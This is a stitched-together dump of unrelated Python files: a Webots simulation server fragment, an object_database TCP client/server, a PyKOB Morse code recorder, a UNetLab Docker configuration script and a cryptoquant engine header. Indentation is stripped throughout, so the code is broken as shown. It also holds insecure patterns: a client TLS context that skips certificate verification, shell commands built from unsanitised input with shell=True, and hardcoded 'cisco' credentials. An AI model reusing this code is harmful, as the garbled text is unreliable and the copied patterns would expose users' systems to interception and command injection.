config['monitorLogEnabled'] = True
if config['monitorLogEnabled']:
monitorFile = os.path.join(simulationLogDir, 'monitor.csv')
try:
if not os.path.exists(simulationLogDir):
os.makedirs(simulationLogDir)
file = open(monitorFile, 'w')
file.write("Timestamp, Webots running, Webots idle, CPU load, CPU memory, "
"GPU load compute, GPU load memory, GPU memory, Swap, Disk, Network sent, Network received\n")
file.close()
except (OSError, IOError) as e:
logging.error("Log file '" + monitorFile + "' cannot be created: " + str(e))
# startup janus server if needed
if 'multimediaServer' in config:
subprocess.Popen(["/opt/janus/bin/janus"])
# startup the server
logging.info("Running simulation server on port %d" % config['port'])
handlers = []
handlers.append((r'/monitor', MonitorHandler))
handlers.append((r'/client', ClientWebSocketHandler))
handlers.append((r'/load', LoadHandler))
handlers.append((r'/(.*)', tornado.web.StaticFileHandler,
{'path': config['WEBOTS_HOME'] + '/resources/web/server/www',
'default_filename': 'index.html'}))
application = tornado.web.Application(handlers)
if 'sslCertificate' in config and 'sslKey' in config:
config['ssl'] = True
ssl_certificate = os.path.abspath(expand_path(config['sslCertificate']))
ssl_key = os.path.abspath(expand_path(config['sslKey']))
ssl_options = {"certfile": ssl_certificate, "keyfile": ssl_key}
http_server = tornado.httpserver.HTTPServer(application, ssl_options=ssl_options)
else:
config['ssl'] = False
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(config['port'])
message = "Simulation server running on port %d (" % config['port']
if not config['ssl']:
message += 'no '
message += 'SSL)'
print(message)
sys.stdout.flush()
try:
nvmlInit()
nvidia = True
except:
nvidia = False
update_snapshot()
try:
tornado.ioloop.IOLoop.current().start()
except Exception:
logging.info(traceback.format_exc())
for client in ClientWebSocketHandler.clients:
del client
if nvidia:
nvmlShutdown()
if sys.platform.startswith('linux'):  # sys.platform is 'linux' on Python 3, 'linux2'/'linux3' on Python 2
# kill all the existing instances of Webots to avoid conflicts with web socket port
os.system("killall -q webots-bin")
# specify the display to ensure Webots can be executed even if this script is started remotely from a ssh session
os.environ["DISPLAY"] = ":0"
# ensure we are in the script directory
os.chdir(os.path.dirname(os.path.realpath(__file__)))
argc = len(sys.argv)
if argc == 1:
config_json = 'config/simulation/default.json'
elif argc == 2:
config_json = sys.argv[1]
else:
sys.exit('Too many arguments.')
with open(config_json) as config_file:
config = json.load(config_file)
if __name__ == '__main__':
main()
|
tcp_server.py
|
from object_database.database_connection import DatabaseConnection
from object_database.server import Server
from object_database.messages import ClientToServer, ServerToClient, getHeartbeatInterval
from object_database.algebraic_protocol import AlgebraicProtocol
from object_database.persistence import InMemoryPersistence
import asyncio
import logging
import ssl
import time
import threading
import socket
import traceback
class ServerToClientProtocol(AlgebraicProtocol):
def __init__(self, dbserver, loop):
AlgebraicProtocol.__init__(self, ClientToServer, ServerToClient)
self.dbserver = dbserver
self.loop = loop
self.connectionIsDead = False
self._logger = logging.getLogger(__name__)
def setClientToServerHandler(self, handler):
def callHandler(*args):
try:
return handler(*args)
except Exception:
self._logger.error("Unexpected exception in %s:\n%s", handler.__name__, traceback.format_exc())
self.handler = callHandler
def messageReceived(self, msg):
self.handler(msg)
def onConnected(self):
self.dbserver.addConnection(self)
def write(self, msg):
if not self.connectionIsDead:
self.loop.call_soon_threadsafe(self.sendMessage, msg)
def connection_lost(self, e):
self.connectionIsDead = True
_eventLoop.loop.call_later(0.01, self.completeDropConnection)
def completeDropConnection(self):
self.dbserver.dropConnection(self)
def close(self):
self.connectionIsDead = True
self.transport.close()
class ClientToServerProtocol(AlgebraicProtocol):
def __init__(self, host, port, eventLoop):
AlgebraicProtocol.__init__(self, ServerToClient, ClientToServer)
self.loop = eventLoop
self.lock = threading.Lock()
self.host = host
self.port = port
self.handler = None
self.msgs = []
self.disconnected = False
self._stopHeartbeatingSet = False
self._logger = logging.getLogger(__name__)
def _stopHeartbeating(self):
self._stopHeartbeatingSet = True
def setServerToClientHandler(self, handler):
with self.lock:
def callHandler(*args):
try:
return handler(*args)
except Exception:
self._logger.error("Unexpected exception in %s:\n%s", handler.__name__, traceback.format_exc())
self.handler = callHandler
for m in self.msgs:
self.loop.call_soon_threadsafe(self.handler, m)
self.msgs = None
def messageReceived(self, msg):
with self.lock:
if not self.handler:
self.msgs.append(msg)
else:
self.loop.call_soon_threadsafe(self.handler, msg)
def onConnected(self):
self.loop.call_later(getHeartbeatInterval(), self.heartbeat)
def heartbeat(self):
if not self.disconnected and not self._stopHeartbeatingSet:
self.sendMessage(ClientToServer.Heartbeat())
self.loop.call_later(getHeartbeatInterval(), self.heartbeat)
def close(self):
self.loop.call_soon_threadsafe(self._close)
def _close(self):
self.disconnected = True
self.transport.close()
def connection_lost(self, e):
self.disconnected = True
self.messageReceived(ServerToClient.Disconnected())
def write(self, msg):
self.loop.call_soon_threadsafe(self.sendMessage, msg)
class EventLoopInThread:
def __init__(self):
self.loop = asyncio.new_event_loop()
self.thread = threading.Thread(target=self.runEventLoop)
self.thread.daemon = True
self.started = False
def runEventLoop(self):
asyncio.set_event_loop(self.loop)
self.loop.run_forever()
def start(self):
if not self.started:
self.started = True
self.thread.start()
def create_connection(self, protocol_factory, host, port, ssl):
self.start()
async def doit():
return await self.loop.create_connection(protocol_factory, host=host, port=port, family=socket.AF_INET, ssl=ssl)
res = asyncio.run_coroutine_threadsafe(doit(), self.loop)
return res.result(10)
def create_server(self, protocol_factory, host, port, ssl):
self.start()
async def doit():
return await self.loop.create_server(protocol_factory, host=host, port=port, family=socket.AF_INET, ssl=ssl)
res = asyncio.run_coroutine_threadsafe(doit(), self.loop)
return res.result(10)
_eventLoop = EventLoopInThread()
def connect(host, port, auth_token, timeout=10.0, retry=False, eventLoop=_eventLoop):
t0 = time.time()
# With CLIENT_AUTH we are setting up the SSL to use encryption only, which is what we want.
# If we also wanted authentication, we would use SERVER_AUTH.
ssl_ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
proto = None
while proto is None:
try:
_, proto = eventLoop.create_connection(
lambda: ClientToServerProtocol(host, port, eventLoop.loop),
host=host,
port=port,
ssl=ssl_ctx
)
except Exception:
if not retry or time.time() - t0 > timeout * .8:
raise
time.sleep(min(timeout, max(timeout / 100.0, 0.01)))
if proto is None:
raise ConnectionRefusedError()
conn = DatabaseConnection(proto)
conn.authenticate(auth_token)
conn.initialized.wait(timeout=max(timeout - (time.time() - t0), 0.0))
assert conn.initialized.is_set()
return conn
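# Illustrative usage (host, port and token below are assumptions, not values from this module):
# conn = connect('localhost', 8000, auth_token='TOKEN', retry=True)
# ... use the DatabaseConnection ...
# A TcpServer can also be used as a context manager, e.g.
# with TcpServer('localhost', 8000, None, ssl_context, 'TOKEN') as server:
#     client = server.connect('TOKEN')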
_eventLoop2 = []
class TcpServer(Server):
def __init__(self, host, port, mem_store, ssl_context, auth_token):
Server.__init__(self, mem_store or InMemoryPersistence(), auth_token)
self.mem_store = mem_store
self.host = host
self.port = port
self.ssl_ctx = ssl_context
self.socket_server = None
self.stopped = False
def start(self):
Server.start(self)
self.socket_server = _eventLoop.create_server(
lambda: ServerToClientProtocol(self, _eventLoop.loop),
host=self.host,
port=self.port,
ssl=self.ssl_ctx
)
_eventLoop.loop.call_soon_threadsafe(self.checkHeartbeatsCallback)
def checkHeartbeatsCallback(self):
if not self.stopped:
_eventLoop.loop.call_later(getHeartbeatInterval(), self.checkHeartbeatsCallback)
try:
self.checkForDeadConnections()
except Exception:
logging.error("Caught exception in checkForDeadConnections:\n%s", traceback.format_exc())
def stop(self):
Server.stop(self)
self.stopped = True
if self.socket_server:
self.socket_server.close()
def connect(self, auth_token, useSecondaryLoop=False):
if useSecondaryLoop:
if not _eventLoop2:
_eventLoop2.append(EventLoopInThread())
loop = _eventLoop2[0]
else:
loop = _eventLoop
return connect(self.host, self.port, auth_token, eventLoop=loop)
def __enter__(self):
self.start()
return self
def __exit__(self, t, v, traceback):
self.stop()
|
recorder.py
|
"""
MIT License
Copyright (c) 2020 PyKOB - MorseKOB in Python
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
"""
Recorder class
Records wire and local station information for analysis and playback.
Plays back recorded information.
The information is recorded in packets in a JSON structure that includes:
1. Timestamp
2. Source (`local`/`wire`)
3. Station ID
4. Wire Number
5. Code type
6. The decoded character
7. Code Sequence (key timing information)
Though the name of the class is `Recorder`, it is typical that a 'recorder' can also
play back. For example, a 'tape recorder', a 'video cassette recorder' (VCR),
a 'digital video recorder' (DVR), etc. can all play back what they (and compatible
devices) have recorded. This class is no exception. It provides methods to play back
recordings in addition to making recordings.
"""
import json
import queue
import threading
import time
from datetime import datetime, timedelta
from enum import Enum, IntEnum, unique
from pykob import config, kob, log
from threading import Lock, RLock
@unique
class PlaybackState(IntEnum):
"""
The current state of recording playback.
"""
idle = 0
playing = 1
paused = 2
def get_timestamp() -> int:
"""
Return the current millisecond timestamp.
Return
------
ts : number
milliseconds since the epoch
"""
ts = int(time.time() * 1000)
return ts
def date_time_from_ts(ts: int) -> str:
"""
Return a Date-Time string from a timestamp.
ts : int
milliseconds since the epoch
Return
------
dtstr : string
A string with the date and time
"""
dateTime = datetime.fromtimestamp(ts / 1000.0)
dateTimeStr = str(dateTime.ctime()) + ": "
return dateTimeStr
def hms_from_ts(ts1: int, ts2: int) -> str:
"""
Return a string with HH:MM:SS from a pair of timestamp values.
ts1 : int
Timestamp 1
ts2 : int
Timestamp 2
Return
------
hms : string
A string in the form HH:MM:SS calculated from the two timestamps.
"""
duration = abs(ts1 - ts2)
tdelta = timedelta(milliseconds=duration)
return str(tdelta)
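# Example of the helpers above (timestamps are illustrative; date_time_from_ts output
# depends on the local time zone):
#   hms_from_ts(1581544820000, 1581544885000)  ->  '0:01:05'
#   date_time_from_ts(1581544820000)           ->  e.g. 'Wed Feb 12 22:00:20 2020: '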
class Recorder:
"""
Recorder class provides functionality to record and playback a code stream.
"""
def __init__(self, target_file_path:str=None, source_file_path:str=None, \
station_id:str="", wire:int=-1, \
play_code_callback=None, \
play_finished_callback=None, \
play_sender_id_callback=None, \
play_wire_callback=None, \
play_station_list_callback=None):
self.__target_file_path = target_file_path
self.__source_file_path = source_file_path
self.__recorder_station_id = station_id
self.__recorder_wire = wire
self.__player_station_id = None
self.__player_wire = 0
self.__play_code_callback = play_code_callback
self.__play_finished_callback = play_finished_callback
self.__play_sender_id_callback = play_sender_id_callback
self.__play_station_list_callback = play_station_list_callback
self.__play_wire_callback = play_wire_callback
self.__playback_state = PlaybackState.idle
self.__playback_thread = None
self.__p_stations_thread = None
self.__playback_resume_flag = threading.Event()
self.__playback_stop_flag = threading.Event()
self.__playback_code = None
self.__list_data = False
self.__max_silence = 0
self.__speed_factor = 100
# Information about the current playback file
self.__p_line_no = 0 # Current line number being processed/played
self.__p_lines = 0 # Number of lines in the file
self.__p_fts = 0 # First (earliest) timestamp
self.__p_lts = 0 # Last (latest) timestamp
self.__p_fpts_index = [] # List of tuples with timestamp, file-position and station-change
self.__p_stations = set() # Set of all stations in the recording
self.__p_fp = None # File pointer for current playback file while playing
self.__p_pblts = -1 # Playback last timestamp
self.__p_fileop_lock = Lock() # Lock to protect file operation access from play and seek threads
@property
def playback_stations(self):
"""
Set of the stations contained in the recording being played.
"""
return self.__p_stations
@property
def playback_state(self):
"""
The current PlaybackState.
"""
return self.__playback_state
@property
def source_file_path(self) -> str:
"""
The path to the source file used to play back a code sequence stored in PyKOB JSON format.
"""
return self.__source_file_path
@source_file_path.setter
def source_file_path(self, path: str):
"""
Set the source file path.
"""
self.__source_file_path = path
@property
def target_file_path(self) -> str:
"""
The path to the target file used to record a code sequence in PyKOB JSON format.
"""
return self.__target_file_path
@target_file_path.setter
def target_file_path(self, target_file_path: str):
"""
Set the target file path to record to.
"""
self.__target_file_path = target_file_path
@property
def station_id(self) -> str:
"""
The Station ID.
"""
return self.__recorder_station_id
@station_id.setter
def station_id(self, station_id: str):
"""
Set the Station ID.
"""
self.__recorder_station_id = station_id
@property
def wire(self) -> int:
"""
The Wire.
"""
return self.__recorder_wire
@wire.setter
def wire(self, wire: int):
"""
Set the recorder Wire.
"""
self.__recorder_wire = wire
def record(self, code, source, text=''):
"""
Record a code sequence in JSON format with additional context information.
"""
if self.__playback_state == PlaybackState.idle: # Only record if not playing back a recording
timestamp = get_timestamp()
data = {
"ts":timestamp,
"w":self.wire,
"s":self.station_id,
"o":source,
"t":text,
"c":code
}
with open(self.__target_file_path, "a+") as fp:
json.dump(data, fp)
fp.write('\n')
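# A recording is one JSON object per line, using the keys written above; for example
# (all field values are illustrative, "o" is the numeric kob.CodeSource value):
#   {"ts": 1581544820100, "w": 101, "s": "Test Station", "o": 1, "t": "H",
#    "c": [-1000, 2, -1000, 60, -60, 60, -60, 60, -60, 60]}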
def playback_move_seconds(self, seconds: int):
"""
Change the current playback position forward/backward 'seconds' seconds.
A recording must be playing or this method does nothing.
"""
# ###
# This calculates a new file position using the current line number being played
# and using the index to find the position to move forward or backward based on
# the requested change and the timestamps in the index.
#
# The movement will be >= the request based on the timestamps for the lines
# in the recording.
#
# This is done using the file-operation lock so the playback can't change while
# the position is being changed. By using the index, this method doesn't take
# long to change the position. Since the playback is going to change anyway,
# the pause doesn't really matter.
# ###
if seconds == 0:
return
with self.__p_fileop_lock: # Lock out any other file access first
if self.__p_fp:
current_lineno = self.__p_line_no
indexlen = len(self.__p_fpts_index)
if current_lineno > 0 and current_lineno < indexlen - 1:
current_ts = self.__p_fpts_index[current_lineno][0]
current_pos = self.__p_fpts_index[current_lineno][1]
target_ts = current_ts + (seconds * 1000) # Calculate the target timestamp
nts = current_ts
new_pos = current_pos
# Move forward or backward?
if seconds > 0:
# Forward...
for i in range(current_lineno, indexlen - 1):
nts = self.__p_fpts_index[i][0]
if nts >= target_ts or i == indexlen - 1:
# If we move one line and the timestamp is >= target, we are done
new_pos = self.__p_fpts_index[i][1] # An index entry is [ts,fpos,station-change]
print(" Move forward to line: {} From: {} Pos: {} From: {} Timestamp: {} From: {}".format(\
i, current_lineno, new_pos, current_pos, nts, current_ts))
self.__p_line_no = i
self.__p_fp.seek(new_pos)
self.__p_pblts = nts # set last timestamp to the new timestamp so there isn't a delay when played
break
else:
# Backward...
for i in range(current_lineno, 0, -1):
nts = self.__p_fpts_index[i][0]
if nts <= target_ts or i == 0:
# If we move one line and the timestamp is <= target, we are done
new_pos = self.__p_fpts_index[i][1] # An index entry is [ts,fpos,station-change]
print(" Move backward to line: {} From: {} Pos: {} From: {} Timestamp: {} From: {}".format(\
i, current_lineno, new_pos, current_pos, nts, current_ts))
self.__p_line_no = i
self.__p_fp.seek(new_pos)
self.__p_pblts = nts # set last timestamp to the new timestamp so there isn't a delay when played
break
def playback_move_to_sender_begin(self):
"""
Change the current playback position back to the beginning of the
current sender.
A recording must be playing or this method does nothing.
"""
# ###
# This calculates a new file position using the current line number being played
# and using the index to find the position to move backward to based on
# the sender/station change flag in the index.
#
# This is done using the file-operation lock so the playback can't change while
# the position is being changed. By using the index, this method doesn't take
# long to change the position. Since the playback is going to change anyway,
# the pause doesn't really matter.
# ###
with self.__p_fileop_lock: # Lock out any other file access first
if self.__p_fp:
current_lineno = self.__p_line_no
indexlen = len(self.__p_fpts_index)
if current_lineno > 0 and current_lineno < indexlen - 1:
current_ts = self.__p_fpts_index[current_lineno][0]
current_pos = self.__p_fpts_index[current_lineno][1]
# Move back through the index checking for a station change
for i in range(current_lineno, 0, -1):
sc = self.__p_fpts_index[i][2] # An index entry is [ts,fpos,station-change]
if sc:
# We found a station change. Go back one more line if possible.
if i > 0:
i -= 1
new_pos = self.__p_fpts_index[i][1]
nts = self.__p_fpts_index[i][0]
print(" Move back to beginning of sender. Line: {} From: {} Pos: {} From: {} Timestamp: {} From: {}".format(\
i, current_lineno, new_pos, current_pos, nts, current_ts))
self.__p_line_no = i
self.__p_fp.seek(new_pos)
self.__p_pblts = nts # set last timestamp to the new timestamp so there isn't a delay when played
break
def playback_move_to_sender_end(self):
"""
Change the current playback position to the end of the
current sender.
A recording must be playing or this method does nothing.
"""
# ###
# This calculates a new file position using the current line number being played
# and using the index to find the position to move forward to based on
# the sender/station change flag in the index.
#
# This is done using the file-operation lock so the playback can't change while
# the position is being changed. By using the index, this method doesn't take
# long to change the position. Since the playback is going to change anyway,
# the pause doesn't really matter.
# ###
with self.__p_fileop_lock: # Lock out any other file access first
if self.__p_fp:
current_lineno = self.__p_line_no
indexlen = len(self.__p_fpts_index)
if current_lineno > 0 and current_lineno < indexlen - 1:
current_ts = self.__p_fpts_index[current_lineno][0]
current_pos = self.__p_fpts_index[current_lineno][1]
# Move forward through the index checking for a station change
for i in range(current_lineno, indexlen-1):
sc = self.__p_fpts_index[i][2] # An index entry is [ts,fpos,station-change]
if sc:
# We found a station change. Go back one line if possible.
if i > 0:
i -= 1
new_pos = self.__p_fpts_index[i][1]
nts = self.__p_fpts_index[i][0]
print(" Move forward to next sender. Line: {} From: {} Pos: {} From: {} Timestamp: {} From: {}".format(\
i, current_lineno, new_pos, current_pos, nts, current_ts))
self.__p_line_no = i
self.__p_fp.seek(new_pos)
self.__p_pblts = nts # set last timestamp to the new timestamp so there isn't a delay when played
break
def playback_resume(self):
"""
Resume a paused playback.
The `playback_start` method must have been called to set up the necessary state
and `playback_pause` must have been called to pause the current playback. Otherwise
this method does nothing.
"""
if self.__playback_state == PlaybackState.paused:
self.__playback_state = PlaybackState.playing
self.__playback_resume_flag.set()
def playback_pause(self):
"""
Pause a currently playing recording.
A recording must be playing or this method does nothing.
"""
if self.__playback_state == PlaybackState.playing:
self.__playback_resume_flag.clear()
self.__playback_state = PlaybackState.paused
def playback_pause_resume(self):
"""
Pause playback if playing, resume playback if paused.
This does nothing if there isn't a playback in progress.
"""
if self.__playback_state == PlaybackState.idle:
return
if self.__playback_state == PlaybackState.playing:
self.playback_pause()
else:
self.playback_resume()
def playback_stop(self):
"""
Stop playback and clear the playback state
"""
if self.__playback_thread:
pt = self.__playback_thread
self.__playback_thread = None
self.__playback_stop_flag.set()
self.__playback_resume_flag.set() # Set resume flag in case playback was paused
def playback_start(self, list_data=False, max_silence=0, speed_factor=100):
"""
Play a recording to the configured sounder.
"""
self.playback_stop()
self.__playback_resume_flag.clear()
self.__playback_stop_flag.clear()
self.__p_fts = -1
self.__p_lts = 0
self.__p_stations.clear()
self.__p_fpts_index = []
self.__p_line_no = 0
self.__p_lines = 0
self.__recorder_station_id = None
self.__recorder_wire = None
self.__list_data = list_data
self.__max_silence = max_silence
self.__speed_factor = speed_factor
#
# Get information from the current playback recording file.
with open(self.__source_file_path, "r") as fp:
self.__p_fpts_index.append((0,0,False)) # Store line 0 as Time=0, Pos=0, Sender-Change=False
previous_station = None
# NOTE: Can't iterate over the file lines as it disables `tell()` and `seek()`.
line = fp.readline()
while line:
try:
fpos = fp.tell()
data = json.loads(line)
ts = data['ts']
wire = data['w']
station = data['s']
# Store the file position and timestamp in the index to use
# for seeking to a line based on time or line number
self.__p_fpts_index.append((ts,fpos,station != previous_station))
previous_station = station
# Get the first and last timestamps from the recording
if self.__p_fts == -1 or ts < self.__p_fts:
self.__p_fts = ts # Set the 'first' timestamp
if self.__p_lts < ts:
self.__p_lts = ts
# Update the number of lines
self.__p_lines +=1
# Generate the station list from the recording
self.__p_stations.add(station)
# Read the next line
line = fp.readline()
except Exception as ex:
log.err("Error processing recording file: '{}' Line: {} Error: {}".format(self.__source_file_path, self.__p_line_no, ex))
return
# Calculate recording file values to aid playback functions
self.__playback_thread = threading.Thread(name='Recorder-Playback-Play', daemon=True, target=self.callbackPlay)
self.__playback_thread.start()
if self.__play_station_list_callback:
self.__p_stations_thread = threading.Thread(name='Recorder-Playback-StationList', daemon=True, target=self.callbackPlayStationList)
self.__p_stations_thread.start()
if self.__list_data:
# Print some values about the recording
print(" Lines: {} Start: {} End: {} Duration: {}".format(self.__p_lines, date_time_from_ts(self.__p_fts), date_time_from_ts(self.__p_lts), hms_from_ts(self.__p_lts, self.__p_fts)))
def callbackPlay(self):
"""
Called by the playback thread `run` to play back recorded code.
"""
self.__p_line_no = 0
self.__p_pblts = -1 # Keep the last timestamp
try:
if not self.source_file_path:
return
self.__playback_state = PlaybackState.playing
#
# With the information from the recording, call the station callback (if set)
if self.__list_data:
print('Stations in recording:')
for s in self.__p_stations:
if self.__list_data:
print(' Station: ', s)
if self.__play_station_list_callback:
self.__play_station_list_callback(s)
with open(self.__source_file_path, "r") as self.__p_fp:
with self.__p_fileop_lock:
# NOTE: Can't iterate over the file lines as it disables `tell()` and `seek()`.
line = self.__p_fp.readline()
self.__p_line_no += 1
while line:
# Get the file lock and read the contents of the line
with self.__p_fileop_lock:
while self.__playback_state == PlaybackState.paused:
self.__playback_resume_flag.wait() # Wait for playback to be resumed
self.__playback_state = PlaybackState.playing
if self.__playback_stop_flag.is_set():
# Playback stop was requested
self.__playback_state = PlaybackState.idle
self.__playback_resume_flag.clear()
return
data = json.loads(line)
#
code = data['c'] # Code sequence
ts = data['ts'] # Timestamp
wire = data['w'] # Wire number
station = data['s'] # Station ID
source = data['o'] # Source/Origin (numeric value from kob.CodeSource)
pblts = self.__p_pblts
self.__p_pblts = ts
# Done with lock
try:
if pblts < 0:
pblts = ts
if self.__list_data:
print(date_time_from_ts(ts), line, end='')
if code == []: # Ignore empty code packets
continue
codePause = -code[0] / 1000.0 # delay since end of previous code sequence and beginning of this one
# For short pauses (< 2 sec), `KOB.sounder` can handle them more precisely.
# However the way `KOB.sounder` handles longer pauses, although it makes sense for
# real-time transmissions, is flawed for playback. Better to handle long pauses here.
# A pause of 32767 ms (0x7FFF) is a special case indicating a discontinuity and requires special
# handling in `KOB.sounder`.
#
# Also check for station change code sequence. If so, pause for recorded timestamp difference
if self.__playback_state == PlaybackState.playing:
pause = 0
if codePause == 32.767 and len(code) > 1 and code[1] == 2:
# Probable sender change. See if it is...
if not station == self.__player_station_id:
if self.__list_data:
print("Sender change.")
pause = round((ts - pblts)/1000, 4)
elif codePause > 2.0 and codePause < 32.767:
# Long pause in sent code
pause = round((((ts - pblts)/1000) - 2.0), 4) # Subtract 2 seconds so kob has some to handle
code[0] = -2000 # Change pause in code sequence to 2 seconds since the rest is handled
if pause > 0:
# Long pause or a station/sender change.
# For very long delays, sleep a maximum of `max_silence` seconds
if self.__max_silence > 0 and pause > self.__max_silence:
if self.__list_data:
print("Realtime pause of {} seconds being reduced to {} seconds".format(pause, self.__max_silence))
pause = self.__max_silence
time.sleep(pause)
if not self.__speed_factor == 100:
sf = 1.0 / (self.__speed_factor / 100.0)
code[:] = [round(sf * c) if (c < 0 or c > 2) and c != -32767 else c for c in code]
self.wire = wire
if self.__play_wire_callback:
self.__play_wire_callback(wire)
self.__player_station_id = station
if self.__play_sender_id_callback:
self.__play_sender_id_callback(station)
if self.__play_code_callback:
self.__play_code_callback(code)
finally:
# Read the next line to be ready to continue the processing loop.
with self.__p_fileop_lock:
line = self.__p_fp.readline()
self.__p_line_no += 1
finally:
self.__playback_stop_flag.set()
self.__playback_state = PlaybackState.idle
if self.__play_finished_callback:
self.__play_finished_callback()
with self.__p_fileop_lock:
self.__p_fp = None
if self.__list_data:
print("Playback done.")
def callbackPlayStationList(self):
"""
Called by the station list thread run method to update a station list
via the registered callback. The station list is refreshed every 5 seconds.
"""
if not self.__play_station_list_callback:
return
while True:
for stn in self.__p_stations:
self.__play_station_list_callback(stn)
stop = self.__playback_stop_flag.wait(5.0) # Wait until 'stop' flag is set or 5 seconds
if stop:
return # Stop signalled - return from run method
"""
Test code
"""
if __name__ == "__main__":
# Self-test
from pykob import morse
test_target_filename = "test." + str(get_timestamp()) + ".json"
myRecorder = Recorder(test_target_filename, test_target_filename, station_id="Test Recorder", wire=-1)
mySender = morse.Sender(20)
# 'HI' at 20 wpm as a test
print("HI")
codesequence = (-1000, +2, -1000, +60, -60, +60, -60, +60, -60, +60,
-180, +60, -60, +60, -1000, +1)
myRecorder.record(codesequence, kob.CodeSource.local)
# Append more text to the same file
for c in "This is a test":
codesequence = mySender.encode(c, True)
myRecorder.record(codesequence, kob.CodeSource.local, c)
print()
# Play the file
# Note: this Recorder was constructed without playback callbacks, so there is no
# hook to drive myKOB directly; playback_start() with list_data=True steps through
# the recording and prints each packet.
myKOB = kob.KOB(port=None, audio=True)
myRecorder.playback_start(list_data=True)
|
config_docker.py
|
#!/usr/bin/env python3
# scripts/config_docker.py
#
# Import/Export script for Docker.io.
#
# @author Andrea Dainese <andrea.dainese@gmail.com>
# @copyright 2014-2016 Andrea Dainese
# @license BSD-3-Clause https://github.com/dainok/unetlab/blob/master/LICENSE
# @link http://www.unetlab.com/
# @version 20160719
import getopt, multiprocessing, os, pexpect, re, subprocess, sys, time
username = 'cisco'
password = 'cisco'
secret = 'cisco'
conntimeout = 3 # Maximum time for console connection
expctimeout = 3 # Maximum time for each short expect
longtimeout = 30 # Maximum time for each long expect
timeout = 60 # Maximum run time (conntimeout is included)
def config_put(docker_pid, config):
for line in config.split(os.linesep):
m = re.match(r'^ip ', line, re.M|re.I)
if m:
# use nsenter for ip configuration
cmd = "/opt/unetlab/wrappers/nsenter -t %s -n %s" %(docker_pid, line)
p1 = subprocess.Popen([cmd], stdout=subprocess.PIPE, shell=True)
p1.wait()
if p1.returncode != 0:
print('ERROR: error executing "%s".' %(cmd))
return False
return True
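# Sketch of the startup-config content config_put() consumes: only lines beginning
# with "ip " are applied, each executed via nsenter inside the container's network
# namespace (addresses below are illustrative):
#   ip address add 10.0.0.10/24 dev eth0
#   ip route add default via 10.0.0.1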
def usage():
print('Usage: %s <standard options>' %(sys.argv[0]))
print('Standard Options:')
print('-a <s> *Action can be:')
print(' - get: get the startup-configuration and push it to a file')
print(' - put: put the file as startup-configuration')
print('-f <s> *File')
print('-i <n> *Docker instance ID')
print('-t <n> Timeout (default = %i)' %(timeout))
print('* Mandatory option')
def now():
# Return current UNIX time in milliseconds
return int(round(time.time() * 1000))
def main(action, filename, docker_id):
try:
if action == 'put':
try:
fd = open(filename, 'r')
config = fd.read()
fd.close()
except:
print('ERROR: cannot read config from file.')
sys.exit(1)
p1 = subprocess.Popen(["/usr/bin/docker -H=tcp://127.0.0.1:4243 inspect --format '{{ .State.Pid }}' %s" %(docker_id)], stdout=subprocess.PIPE, shell=True)
p1.wait()
output, error = p1.communicate()
docker_pid = output.decode("utf-8").rstrip()
rc = config_put(docker_pid, config)
if not rc:
print('ERROR: failed to push config.')
sys.exit(1)
# Remove lock file
lock = '%s/.lock' %(os.path.dirname(filename))
if os.path.exists(lock):
os.remove(lock)
# Mark as configured
configured = '%s/.configured' %(os.path.dirname(filename))
if not os.path.exists(configured):
open(configured, 'a').close()
sys.exit(0)
except Exception as e:
print('ERROR: got an exception')
print(type(e)) # the exception instance
print(e.args) # arguments stored in .args
print(e) # __str__ allows args to be printed directly, but may be overridden in exception subclasses
return False
if __name__ == "__main__":
action = None
filename = None
docker_id = None
# Getting parameters from command line
try:
opts, args = getopt.getopt(sys.argv[1:], 'a:i:t:f:', ['action=', 'id=', 'timeout=', 'file='])
except getopt.GetoptError as e:
usage()
sys.exit(3)
for o, a in opts:
if o in ('-a', '--action'):
action = a
elif o in ('-f', '--file'):
filename = a
elif o in ('-i', '--id'):
docker_id = a
elif o in ('-t', '--timeout'):
try:
timeout = int(a)
except:
timeout = -1
else:
print('ERROR: invalid parameter.')
# Checking mandatory parameters
if action is None or docker_id is None or filename is None:
usage()
print('ERROR: missing mandatory parameters.')
sys.exit(1)
if action not in ['get', 'put']:
usage()
print('ERROR: invalid action.')
sys.exit(1)
if timeout < 0:
usage()
print('ERROR: timeout must be 0 or higher.')
sys.exit(1)
if action == 'get' and os.path.exists(filename):
usage()
print('ERROR: destination file already exists.')
sys.exit(1)
if action == 'put' and not os.path.exists(filename):
usage()
print('ERROR: source file does not exist.')
sys.exit(1)
if action == 'put':
try:
fd = open(filename, 'r')
config = fd.read()
fd.close()
except:
usage()
print('ERROR: cannot read from file.')
sys.exit(1)
# Backgrounding the script
end_before = now() + timeout * 1000
p = multiprocessing.Process(target=main, name="Main", args=(action, filename, docker_id))
p.start()
while (p.is_alive() and now() < end_before):
# Waiting for the child process to end
time.sleep(1)
if p.is_alive():
# Timeout occurred
print('ERROR: timeout occurred.')
p.terminate()
sys.exit(127)
if p.exitcode != 0:
sys.exit(127)
sys.exit(0)
|
engine.py
|
"""
"""
import logging
import smtplib
import os
from abc import ABC
from datetime import datetime
from email.message import EmailMessage
from queue import Empty, Queue
from threading import Thread
from typing import Any, Sequence, Type
from cryptoquant.event import Event, EventEngine
from .app import BaseApp
from .event import (
EVENT_TICK,
EVENT_ORDER,
EVENT_TRADE,
EVENT_POSITION,
EVENT_ACCOUNT,
EVENT_CONTRACT,
EVENT_LOG
)
from .gateway import BaseGateway
from .object import (
CancelRequest,
LogData,
OrderRequest,
SubscribeRequest,
HistoryRequest
)
from .setting import SETTINGS
from .utility import get_folder_path, TRADER_DIR
